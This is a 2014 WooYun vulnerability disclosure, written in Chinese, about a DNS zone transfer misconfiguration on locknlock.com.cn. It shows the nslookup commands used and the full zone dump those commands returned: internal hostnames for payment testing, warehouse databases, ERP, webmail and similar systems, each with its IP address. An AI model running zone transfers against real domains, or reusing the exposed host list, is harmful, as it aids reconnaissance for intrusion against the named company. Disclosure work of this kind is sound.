漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
...
貌似今天下午上货是他们的哦,百度下发现还挺厉害
详细说明:
乐扣乐扣
连载系列~
DNS域解析漏洞
C:\Users\Administrator>nslookup
默认服务器: google-public-dns-a.google.com
Address: 8.8.8.8
> set type=ns
> locknlock.com.cn
服务器: google-public-dns-a.google.com
Address: 8.8.8.8
非权威应答:
locknlock.com.cn nameserver = dns.stn.sh.cn
locknlock.com.cn nameserver = sns.stn.sh.cn
> server dns.stn.sh.cn
默认服务器: dns.stn.sh.cn
Address: 203.95.1.1
> ls locknlock.com.cn
[dns.stn.sh.cn]
locknlock.com.cn. A 210.14.70.17
locknlock.com.cn. NS server = dns.stn.sh.cn
locknlock.com.cn. NS server = sns.stn.sh.cn
api A 210.14.70.17
asset A 210.14.70.31
china A 210.14.70.17
ctbs01 A 211.144.122.81
ctbs02 A 211.144.122.83
demo A 210.14.70.17
demoapi A 210.14.70.17
desk A 210.5.153.216
ecode A 210.14.70.25
ecrm A 210.14.70.26
fsos A 210.14.70.17
hblm A 210.14.70.25
im A 210.5.158.132
img A 210.14.70.22
llog A 210.5.153.211
lsms A 210.14.70.27
m A 210.5.158.130
mall A 210.14.70.17
marcom A 210.14.70.31
mobile A 210.5.158.130
newapi A 210.14.70.23
newscm A 210.14.70.23
partner A 210.14.70.21
paytest A 210.14.70.17
pos A 210.14.70.20
sap_bpc A 218.234.78.22
scm A 210.14.70.19
smssh A 210.5.153.210
taobao A 210.14.70.19
test A 210.14.70.17
ts A 210.5.153.221
vc A 210.5.158.133
weberp A 210.14.70.17
webmail A 210.5.158.130
wmsapp A 210.14.64.201
wmsdb A 210.14.64.202
wmsif A 210.14.64.203
www A 210.14.70.17
>
ok
漏洞证明:
如上
修复方案:
改~
版权声明:转载请注明来源 爱上平顶山@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝